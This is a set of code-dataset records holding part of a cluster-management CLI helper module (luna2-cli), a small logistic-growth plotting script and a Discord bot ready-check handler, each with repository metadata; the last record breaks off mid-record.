response = dig_grabbing_status(uri)\n if response:\n Message().show_success(f'[========] OS Image Grabbed for node {data[\"name\"]}.')\n else:\n Message().error_exit(result.content, result.status_code)\n return True\n\n\n def push_osimage(self, table=None, data=None):\n \"\"\"\n Method to push an osimage for a node or a group.\n \"\"\"\n process1 = Process(target=Helper().loader, args=(\"OS Image Pushing...\",))\n process1.start()\n response = False\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n uri = f'config/{table}/{data[\"name\"]}/_ospush'\n data = 
self.prepare_payload(table, data)\n request_data = {'config':{table:{data['name']: data}}}\n self.logger.debug(f'Payload => {data}')\n http_response = Rest().post_raw(uri, request_data)\n result = http_response\n if http_response.status_code == 200:\n http_response = http_response.json()\n if 'request_id' in http_response.keys():\n uri = f'config/status/{http_response[\"request_id\"]}'\n def dig_push_status(uri):\n result = Rest().get_raw(uri)\n if result.status_code == 404:\n process1.terminate()\n return True\n elif result.status_code == 200:\n http_response = result.json()\n if http_response['message']:\n message = http_response['message'].split(';;')\n for msg in message:\n sleep(2)\n Message().show_success(f'{msg}')\n sleep(2)\n return dig_push_status(uri)\n else:\n return False\n response = dig_push_status(uri)\n if response:\n Message().show_success(f'[========] OS Image Pushed for {table} {data[\"name\"]}.')\n else:\n Message().error_exit(result.content, result.status_code)\n return True\n\n\n def get_hostlist(self, raw_hosts=None):\n \"\"\"\n This method will perform power option on node.\n \"\"\"\n response = []\n self.logger.debug(f'Received hostlist: {raw_hosts}.')\n try:\n response = hostlist.expand_hostlist(raw_hosts)\n self.logger.debug(f'Expanded hostlist: {response}.')\n except hostlist.BadHostlist:\n self.logger.debug(f'Hostlist is incorrect: {raw_hosts}.')\n return response\n\n\n def common_list_args(self, parser=None):\n \"\"\"\n This method will provide the common list and show arguments..\n \"\"\"\n parser.add_argument('-v', '--verbose', action='store_true', help='Verbose Mode')\n parser.add_argument('-R', '--raw', action='store_true', help='Raw JSON output')\n return parser\n\n\n def loader(self, message=None):\n \"\"\"\n This method is a loader, will run while transactions happens.\n \"\"\"\n animation = [\n f\"[= ] {message}\",\n f\"[=== ] {message}\",\n f\"[==== ] {message}\",\n f\"[===== ] {message}\",\n f\"[====== ] {message}\",\n f\"[======= ] {message}\",\n f\"[========] {message}\",\n f\"[ =======] {message}\",\n f\"[ ======] {message}\",\n f\"[ =====] {message}\",\n f\"[ ====] {message}\",\n f\"[ ===] {message}\",\n f\"[ ==] {message}\",\n f\"[ =] {message}\",\n f\"[ ] {message}\",\n f\"[ ] {message}\", ]\n not_complete = True\n i = 0\n try:\n while not_complete:\n print(animation[i % len(animation)], end='\\r')\n sleep(.1)\n i += 1\n except KeyboardInterrupt:\n return False\n return True\n\n\n def control_print(self, system=None, content=None, count=None):\n \"\"\"\n This method will parse the data for Control API's.\n \"\"\"\n result = {}\n possible_cases = ['ok', 'on', 'off']\n if 'failed' in content['control']:\n for key, value in content['control']['failed'].items():\n result[key] = value\n\n if system in content['control']:\n for case in possible_cases:\n if case in content['control'][system]:\n for key, value in content['control'][system][case].items():\n result[key] = case.upper()\n result = dict(sorted(result.items()))\n\n header = \"| # | Node Name | \"\n header += \"Status |\"\n hr_line = 'X--------------------------------------------'\n hr_line += '--------------------------------------------X'\n rows = []\n for key, value in result.items():\n rows.append([count, key, value])\n count = count + 1\n\n if rows:\n for row in rows:\n if row[0] == 1:\n Message().show_success(hr_line)\n Message().show_success(header)\n Message().show_success(hr_line)\n row[0] = f'{row[0]}'.ljust(6)\n row[1] = f'{row[1]}'.ljust(19)\n row[2] = f'{row[2]}'.ljust(58)\n line 
= f'| {row[0]}| {row[1]}| {row[2]}|'\n Message().show_success(line)\n return count\n\n\n def dig_control_status(self, request_id=None, count=None, system=None):\n \"\"\"\n This method will fetch the status of Control API.\n \"\"\"\n uri = f'control/status/{request_id}'\n sleep(2)\n status = Rest().get_raw(uri)\n status_json = status.json()\n if status.status_code == 200:\n count = Helper().control_print(system, status_json, count)\n return self.dig_control_status(request_id, count, system)\n elif status.status_code == 404:\n hr_line = 'X--------------------------------------------'\n hr_line += '--------------------------------------------X'\n Message().show_success(hr_line)\n else:\n Message().show_error(f\"Something Went Wrong {status.status_code}\")\n\n\n def filter_interface(self, table=None, data=None):\n \"\"\"\n This method will generate the data as for\n row format from the interface\n \"\"\"\n self.logger.debug(f'table => {table}')\n self.logger.debug(f'data => {data}')\n fields, rows, colored_fields = [], [], []\n fields = filter_columns(table)\n self.logger.debug(f'fields => {fields}')\n for field_key in fields:\n val_row = []\n for ele in data:\n if field_key in list(ele.keys()):\n if ele[field_key] == 'in progress':\n val_row.append(colored('in progress', 'green'))\n elif ele[field_key] == 'queued':\n val_row.append(colored('queued', 'yellow'))\n elif ele[field_key] == 1:\n val_row.append(colored('yes', 'green'))\n elif ele[field_key] == 0:\n val_row.append(colored('no', 'yellow'))\n elif ele[field_key] == 'maintask':\n val_row.append(colored('Main Task', 'blue'))\n elif ele[field_key] == 'subtask':\n val_row.append(colored('Sub Task', 'magenta'))\n else:\n val_row.append(ele[field_key])\n else:\n val_row.append(\"--NA--\")\n self.logger.debug(f'Element => {ele}')\n rows.append(val_row)\n val_row = []\n colored_fields.append(field_key)\n fields = colored_fields\n self.logger.debug(f'Rows before Swapping => {rows}')\n final_rows = []\n for array in range(len(rows[0])) :\n tmp = []\n for element in rows:\n tmp.append(element[array])\n final_rows.append(tmp)\n rows = final_rows\n # Adding Serial Numbers to the dataset\n fields.insert(0, '#')\n num = 1\n for outer in rows:\n outer.insert(0, num)\n num = num + 1\n # Adding Serial Numbers to the dataset\n return fields, rows\n\n\n def filter_data(self, table=None, data=None):\n \"\"\"\n This method will generate the data as for\n row format\n \"\"\"\n self.logger.debug(f'Table => {table}')\n self.logger.debug(f'Data => {data}')\n fields, rows, colored_fields = [], [], []\n fields = filter_columns(table)\n self.logger.debug(f'Fields => {fields}')\n for field_key in fields:\n val_row = []\n for ele in data:\n if field_key in list((data[ele].keys())):\n if isinstance(data[ele][field_key], list):\n new_list = []\n for internal in data[ele][field_key]:\n for internal_val in internal:\n self.logger.debug(f'Key => {internal_val}')\n self.logger.debug(f'Value => {internal[internal_val]}')\n in_key = internal_val\n in_val = internal[internal_val]\n new_list.append(f'{in_key} = {in_val} ')\n new_list = '\\n'.join(new_list)\n val_row.append(new_list)\n new_list = []\n elif field_key == 'tpm_uuid':\n if data[ele][field_key]:\n val_row.append(True)\n else:\n val_row.append(False)\n else:\n val_row.append(data[ele][field_key])\n else:\n val_row.append(\"--NA--\")\n rows.append(val_row)\n self.logger.debug(f'Each Row => {val_row}')\n val_row = []\n colored_fields.append(field_key)\n fields = colored_fields\n final_rows = []\n for array in 
range(len(rows[0])) :\n tmp = []\n for element in rows:\n tmp.append(element[array])\n final_rows.append(tmp)\n rows = final_rows\n # Adding Serial Numbers to the dataset\n fields.insert(0, '#')\n num = 1\n for outer in rows:\n outer.insert(0, num)\n num = num + 1\n # Adding Serial Numbers to the dataset\n return fields, rows\n\n\n def base64_encode(self, content=None):\n \"\"\"\n This method will encode a base 64 string.\n \"\"\"\n try:\n if content is not None:\n content = base64.b64encode(content).decode(\"utf-8\")\n except binascii.Error:\n self.logger.debug(f'Base64 Encode Error => {content}')\n return content\n\n\n def base64_decode(self, content=None):\n \"\"\"\n This method will decode the base 64 string.\n \"\"\"\n try:\n if content is not None:\n content = content.replace(\"\\r\", \"\\\\r\")\n content = base64.b64decode(content, validate=True).decode(\"utf-8\")\n except binascii.Error:\n self.logger.debug(f'Base64 Decode Error => {content}')\n except UnicodeDecodeError:\n self.logger.debug(f'Base64 Unicode Decode Error => {content}')\n return content\n\n\n def update_dict(self, data=None):\n \"\"\"\n Deep Update the Dict\n \"\"\"\n for key, value in data.items():\n if isinstance(value, str):\n value = None if value == 'None' else value\n if value is not None:\n data[key] = self.base64_decode(value)\n return self.update_dict(data)\n else:\n return self.update_dict(data)\n return data\n\n\n def callback(self, value=None):\n \"\"\"\n This method is a call back method for the nested lookup.\n \"\"\"\n if isinstance(value, str):\n if value.lower() == 'none':\n value = None\n elif value.lower() == 'true':\n value = True\n elif value.lower() == 'false':\n value = False\n elif value.lower() == 'null':\n value = None\n response = value\n if value not in [None, True, False] and isinstance(value, str):\n response = self.base64_decode(value)\n return response\n\n\n def nested_dict(self, dictionary=None, limit=False):\n \"\"\"\n This method will check the nested dictionary.\n \"\"\"\n for key, value in dictionary.items():\n if isinstance(value, str):\n if key in EDITOR_KEYS:\n doc = nested_alter({key : value}, key, self.callback)\n dictionary[key] = self.less_content(doc[key], limit)\n else:\n dictionary[key] = value\n elif isinstance(value, dict):\n return self.nested_dict(dictionary, limit)\n elif isinstance(value, list):\n return self.nested_list(dictionary, key, value, limit)\n return dictionary\n\n\n def nested_list(self, dictionary=None, key=None, value=None, limit=False):\n \"\"\"\n This method will check the list for a dictionary.\n \"\"\"\n response = []\n if value:\n for occurrence in value:\n if isinstance(occurrence, str):\n if key in EDITOR_KEYS:\n doc = nested_alter({key : occurrence}, key, self.callback)\n response.append(self.less_content(doc[key], limit))\n else:\n response.append(occurrence)\n elif isinstance(occurrence, dict):\n response.append(self.nested_dict(occurrence, limit))\n dictionary[key] = response\n return dictionary\n\n\n def less_content(self, content=None, limit=False):\n \"\"\"\n This method will reduce the length of the content.\n \"\"\"\n if limit:\n if content not in [None, True, False] and isinstance(content, str):\n if len(content) > 60:\n content = content[:60]+' ...'\n return content\n\n\n def prepare_json(self, json_data=None, limit=False):\n \"\"\"\n This method will decode the base 64 string.\n \"\"\"\n self.logger.debug(f'Data Limit => {limit}')\n if isinstance(json_data, dict):\n for key, value in json_data.items():\n if isinstance(value, str):\n 
if key in EDITOR_KEYS:\n doc = nested_alter({key : value}, key, self.callback)\n json_data[key] = self.less_content(doc[key], limit)\n else:\n json_data[key] = value\n elif isinstance(value, dict):\n json_data[key] = self.nested_dict(value, limit)\n elif isinstance(value, list):\n final_list = []\n if value:\n for occurrence in value:\n if isinstance(occurrence, str):\n doc = nested_alter({key : occurrence}, key, self.callback)\n final_list.append(self.less_content(doc[key], limit))\n elif isinstance(occurrence, dict):\n final_list.append(self.nested_dict(occurrence, limit))\n json_data[key] = final_list\n return json_data\n\n\n def get_secrets(self, table=None, data=None):\n \"\"\"\n This method will filter data for Secrets\n \"\"\"\n self.logger.debug(f'Table => {table} and Data => {data}')\n rows, colored_fields = [], []\n fields = filter_columns(table)\n self.logger.debug(f'Fields => {fields}')\n for key in data:\n new_row = []\n for value in data[key]:\n self.logger.debug(f'Key => {key} and Value => {value}')\n new_row.append(key)\n new_row.append(value['name'])\n new_row.append(value['path'])\n content = self.base64_decode(value['content'])\n if content is not None:\n new_row.append(content[:60]+'...')\n else:\n new_row.append(content)\n rows.append(new_row)\n new_row = []\n for newfield in fields:\n colored_fields.append(newfield)\n fields = colored_fields\n # Adding Serial Numbers to the dataset\n fields.insert(0, '#')\n num = 1\n for outer in rows:\n outer.insert(0, num)\n num = num + 1\n # Adding Serial Numbers to the dataset\n return fields, rows\n\n\n def filter_secret_col(self, table=None, data=None):\n \"\"\"\n This method will generate the data as for\n row format\n \"\"\"\n self.logger.debug(f'Table => {table} and Data => {data}')\n rows, colored_fields = [], []\n fields = sortby(table)\n self.logger.debug(f'Fields => {fields}')\n for key in data:\n new_row = []\n for value in data[key]:\n self.logger.debug(f'Key => {key} and Value => {value}')\n new_row.append(key)\n new_row.append(value['name'])\n new_row.append(value['path'])\n content = self.base64_decode(value['content'])\n if content is not None:\n new_row.append(content[:60]+'...')\n else:\n new_row.append(content)\n # new_row.append(content)\n rows.append(new_row)\n new_row = []\n for newfield in fields:\n colored_fields.append(newfield)\n fields = colored_fields\n # Adding Serial Numbers to the dataset\n fields.insert(0, '#')\n num = 1\n for outer in rows:\n outer.insert(0, num)\n num = num + 1\n # Adding Serial Numbers to the dataset\n new_fields, new_row = [], []\n for row in rows:\n new_fields = new_fields + fields\n new_row = new_row + row\n new_fields.append(\"\")\n new_row.append(\"\")\n return new_fields, new_row\n\n\n def filter_data_col(self, table=None, data=None):\n \"\"\"\n This method will generate the data as for row format\n \"\"\"\n self.logger.debug(f'Table => {table} and Data => {data}')\n defined_keys = sortby(table)\n self.logger.debug(f'Fields => {defined_keys}')\n data = self.merge_source(table, data)\n for new_key in list(data.keys()):\n if new_key not in defined_keys:\n defined_keys.append(new_key)\n index_map = {v: i for i, v in enumerate(defined_keys)}\n data = sorted(data.items(), key=lambda pair: index_map[pair[0]])\n self.logger.debug(f'Sorted Data => {data}')\n fields, rows = [], []\n for key in data:\n fields.append(key[0])\n if isinstance(key[1], list):\n new_list = []\n for internal in key[1]:\n for internal_val in internal:\n self.logger.debug(f'Key: {internal_val} Value: 
{internal[internal_val]}')\n if internal_val == \"interface\":\n new_list.append(f'{internal_val} = {internal[internal_val]}')\n else:\n new_list.append(f' {internal_val} = {internal[internal_val]}')\n new_list = '\\n'.join(new_list)\n rows.append(new_list)\n new_list = []\n elif isinstance(key[1], dict):\n new_list = []\n num = 1\n for internal in key[1]:\n self.logger.debug(f'Key => {internal} and Value => {key[1][internal]}')\n in_key = internal\n in_val = key[1][internal]\n new_list.append(f'{in_key} = {in_val} ')\n num = num + 1\n new_list = '\\n'.join(new_list)\n rows.append(new_list)\n new_list = []\n else:\n rows.append(key[1])\n return fields, rows\n\n\n def merge_source(self, table=None, data=None):\n \"\"\"\n This method will merge *_source field to the real field with braces and remove the\n *_source keys from the output.\n \"\"\"\n response = deepcopy(data)\n for key, value in data.items():\n script = True if 'part' in key or 'post' in key or 'pre' in key else False\n if '_source' in key:\n raw_name = key.replace('_source', '')\n if isinstance(data[raw_name], str):\n default_value = data[raw_name].rstrip()\n if len(default_value) == 0:\n default_value = ''\n else:\n default_value = data[raw_name]\n if value in data:\n if script is True and default_value != '':\n response[raw_name] = f'({data[value]}) {default_value}'\n else:\n response[raw_name] = f'{default_value} ({data[value]})'\n else:\n if str(value) == str(table):\n response[raw_name] = f'{default_value}'\n else:\n if script is True and default_value != '':\n response[raw_name] = f'({value}) {default_value}'\n else:\n response[raw_name] = f'{default_value} ({value})'\n del response[key]\n return response\n\n\n def filter_osimage_col(self, table=None, data=None):\n \"\"\"\n This method will generate the data as for row format\n \"\"\"\n self.logger.debug(f'Table => {table} and Data => {data}')\n defined_keys = sortby(table)\n self.logger.debug(f'Fields => {defined_keys}')\n for new_key in list(data.keys()):\n if new_key not in defined_keys:\n defined_keys.append(new_key)\n index_map = {v: i for i, v in enumerate(defined_keys)}\n data = sorted(data.items(), key=lambda pair: index_map[pair[0]])\n self.logger.debug(f'Sorted Data => {data}')\n osimage = [\"OS Image\\n\"]\n fields, rows = [\"Tags\\n\"], [\"Details\\n\"]\n for key in data:\n fields.append(key[0])\n osimage.append(key[1]['osimage'])\n if isinstance(key[1], list):\n new_list = []\n for internal in key[1]:\n for internal_val in internal:\n self.logger.debug(f'Key: {internal_val} Value: {internal[internal_val]}')\n if internal_val == \"interface\":\n new_list.append(f'{internal_val} = {internal[internal_val]}')\n else:\n new_list.append(f' {internal_val} = {internal[internal_val]}')\n new_list = '\\n'.join(new_list)\n rows.append(new_list)\n new_list = []\n elif isinstance(key[1], dict):\n new_list = []\n num = 1\n for internal in key[1]:\n self.logger.debug(f'Key => {internal} and Value => {key[1][internal]}')\n if internal != \"name\":\n in_key = internal\n in_val = key[1][internal]\n if len(key[1]) == num:\n new_list.append(f'{in_key} = {in_val} \\n')\n else:\n new_list.append(f'{in_key} = {in_val} ')\n num = num + 1\n new_list = '\\n'.join(new_list)\n rows.append(new_list)\n new_list = []\n else:\n rows.append(key[1])\n return fields, osimage, rows\n", "repo_name": "clustervision/luna2-cli", "sub_path": "luna/utils/helper.py", "file_name": "helper.py", "file_ext": "py", "file_size_in_byte": 40945, "program_lang": "python", "lang": "en", "doc_type": "code", 
"stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "luna.utils.log.Log.get_logger", "line_number": 37, "usage_type": "call"}, {"api_name": "luna.utils.log.Log", "line_number": 37, "usage_type": "name"}, {"api_name": "luna.utils.constant.BOOL_KEYS", "line_number": 45, "usage_type": "name"}, {"api_name": "nested_lookup.nested_lookup", "line_number": 46, "usage_type": "call"}, {"api_name": "nested_lookup.nested_update", "line_number": 50, "usage_type": "call"}, {"api_name": "nested_lookup.nested_update", "line_number": 52, "usage_type": "call"}, {"api_name": "nested_lookup.nested_update", "line_number": 54, "usage_type": "call"}, {"api_name": "luna.utils.constant.EDITOR_KEYS", "line_number": 64, "usage_type": "name"}, {"api_name": "nested_lookup.nested_lookup", "line_number": 65, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 69, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 73, "usage_type": "call"}, {"api_name": "nested_lookup.nested_lookup", "line_number": 75, "usage_type": "call"}, {"api_name": "nested_lookup.nested_update", "line_number": 78, "usage_type": "call"}, {"api_name": "nested_lookup.nested_update", "line_number": 81, "usage_type": "call"}, {"api_name": "nested_lookup.nested_delete", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "nested_lookup.nested_update", "line_number": 89, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 91, "usage_type": "call"}, {"api_name": "nested_lookup.nested_update", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.chmod", "line_number": 107, "usage_type": "call"}, {"api_name": "time.time", "line_number": 108, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 108, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 108, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 110, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 120, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 121, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 124, "usage_type": "call"}, {"api_name": "os.rmdir", "line_number": 125, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 135, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 139, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 146, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 155, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 157, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 168, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 172, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 181, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 188, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 190, "usage_type": "call"}, {"api_name": 
"luna.utils.rest.Rest", "line_number": 199, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 203, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 209, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 219, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 221, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 230, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 234, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 240, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 250, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 252, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 265, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 268, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 270, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 273, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 275, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 298, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 300, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 303, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 305, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 307, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 311, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 313, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 315, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 326, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 329, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 331, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 343, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 346, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 348, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 361, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 364, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 366, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 374, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 383, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 390, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 399, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 400, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 401, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 407, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 409, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 417, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 426, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 
433, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 442, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 443, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 444, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 450, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 452, "usage_type": "call"}, {"api_name": "hostlist.expand_hostlist", "line_number": 463, "usage_type": "call"}, {"api_name": "hostlist.BadHostlist", "line_number": 465, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 505, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 541, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 542, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 543, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 548, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 557, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 558, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 566, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 568, "usage_type": "call"}, {"api_name": "luna.utils.constant.filter_columns", "line_number": 579, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 586, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 588, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 590, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 592, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 594, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 596, "usage_type": "call"}, {"api_name": "luna.utils.constant.filter_columns", "line_number": 632, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 687, "usage_type": "call"}, {"api_name": "binascii.Error", "line_number": 688, "usage_type": "attribute"}, {"api_name": "base64.b64decode", "line_number": 700, "usage_type": "call"}, {"api_name": "binascii.Error", "line_number": 701, "usage_type": "attribute"}, {"api_name": "luna.utils.constant.EDITOR_KEYS", "line_number": 748, "usage_type": "name"}, {"api_name": "nested_lookup.nested_alter", "line_number": 749, "usage_type": "call"}, {"api_name": "luna.utils.constant.EDITOR_KEYS", "line_number": 768, "usage_type": "name"}, {"api_name": "nested_lookup.nested_alter", "line_number": 769, "usage_type": "call"}, {"api_name": "luna.utils.constant.EDITOR_KEYS", "line_number": 798, "usage_type": "name"}, {"api_name": "nested_lookup.nested_alter", "line_number": 799, "usage_type": "call"}, {"api_name": "nested_lookup.nested_alter", "line_number": 810, "usage_type": "call"}, {"api_name": "luna.utils.constant.filter_columns", "line_number": 824, "usage_type": "call"}, {"api_name": "luna.utils.constant.sortby", "line_number": 860, "usage_type": "call"}, {"api_name": "luna.utils.constant.sortby", "line_number": 901, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 947, "usage_type": "call"}, {"api_name": "luna.utils.constant.sortby", "line_number": 980, "usage_type": "call"}]}
+{"seq_id": "6230116645", "text": "#written using python2.7 (renamed .py to .txt)\n\n\n#created 2 plots (1 semilog,1 linear)\n#I decreased step size and increased time to get a longer plot\n\nimport matplotlib.pyplot as plt\n\ndef integrate(r,k):\n\tt=0 \n\tdx=.001 #small perturbation\n\tx=0.001 #initial x\n\tdt=.01\n\twhile t<12:\n\t\tdxdt=r*x*(1-x/k)/(k*r) #function\n\t\tx+= dxdt*dt/k #incrimenting x values\n\t\tt+=dt*r #incrimenting time values\n\t\t#plt.plot(t,x,'--bo')\n\t\tplt.ylabel(\"X(t)\")\n\t\tplt.xlabel(\"Time\")\n\t\tplt.semilogy(t,x,'--bo')\n\t#print(t,x)\nintegrate(4,30) ##r affects rise rate, k leads to asymptote \nintegrate(2,2)\nintegrate(1,4) \nintegrate(15,1)\nintegrate(20,5)\nplt.show()\n\n\n", "repo_name": "bpc5604/chaos", "sub_path": "HW03/hw03.py", "file_name": "hw03.py", "file_ext": "py", "file_size_in_byte": 654, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.ylabel", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.semilogy", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}]}
+{"seq_id": "38610606928", "text": "import time, datetime\nimport sched\n\nimport discord\nfrom discord.ext import commands, tasks\n\nimport config\nimport embeds\n\npop_message: discord.message\n\n# keeping track of who's in a pop\npopped_members = []\nwaiting_members = []\n\n# ending timestamp\nend_time = \"\"\n\n\n# since these buttons only apply inside this handler they can be here\nclass ReadyButton(discord.ui.View):\n def __init__(self, head_text):\n super().__init__(timeout=None)\n self.header = head_text\n\n @discord.ui.button(label=\"Ready!\", style=discord.ButtonStyle.primary)\n async def ready_button(self, interaction: discord.Interaction, button: discord.ui.Button):\n await interaction.response.defer()\n accept_player(interaction.user)\n await interaction.message.edit(content=self.header,\n embed=embeds.get_waiting_embed_unix(waiting_members=waiting_members,\n end_time=end_time))\n\n\n@tasks.loop(seconds=1, count=config.queue_timer)\nasync def queue_timer():\n if len(waiting_members) == 0:\n queue_timer.stop()\n\n\n@queue_timer.after_loop\nasync def after_timer():\n return\n\n\n# remove a player from the list of un-accepted players when they ready\ndef accept_player(player):\n global waiting_members\n\n if player in waiting_members:\n waiting_members.remove(player)\n\n\n# seeing who in a pop is readying\nasync def afk_check_pop(channel, popped_players, new_players):\n global popped_members\n global waiting_members\n global pop_message\n global end_time\n\n # set up queue timer\n remaining_time = config.queue_timer\n\n end_time = f''\n\n scheduler = sched.scheduler(time.time, time.sleep)\n\n # mem issues w/ refs requires you to make copy here\n popped_members = popped_players.copy()\n waiting_members = new_players.copy()\n\n print(popped_members)\n\n # create a header listing match members so you can see who's actually in the match\n header = \"Match Ready For: \\n\"\n\n for member in popped_players:\n id = member.id\n header += f'<@{id}> '\n\n # this gets updated each loop cycle\n temp = header + \"\\nWaiting On: \\n \"\n\n for member in waiting_members:\n id = member.id\n temp += f'<@{id}> '\n\n temp += \"\\nTime Remaining: \" + str(remaining_time)\n\n # add message and reaction\n # copy needed to fix mem issues with async\n pop_message_temp = await channel.send(content=header, view=ReadyButton(header),\n embed=embeds.get_waiting_embed_unix(waiting_members=waiting_members,\n end_time=end_time))\n pop_message = pop_message_temp\n\n # start queue countdown\n await queue_timer.start()\n\n # remove the expired pop message\n await pop_message_temp.delete()\n\n return\n\n\n# clear popped members from memory\ndef clear_pop():\n global popped_members\n\n popped_members = []\n", "repo_name": "Acoliver102/Tonguelash", "sub_path": "pop_handler.py", "file_name": "pop_handler.py", "file_ext": "py", "file_size_in_byte": 3033, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "discord.message", "line_number": 10, "usage_type": "attribute"}, {"api_name": "discord.ui", "line_number": 21, "usage_type": "attribute"}, {"api_name": "discord.Interaction", "line_number": 27, "usage_type": "attribute"}, {"api_name": "discord.ui", "line_number": 27, "usage_type": "attribute"}, {"api_name": "embeds.get_waiting_embed_unix", "line_number": 31, "usage_type": "call"}, 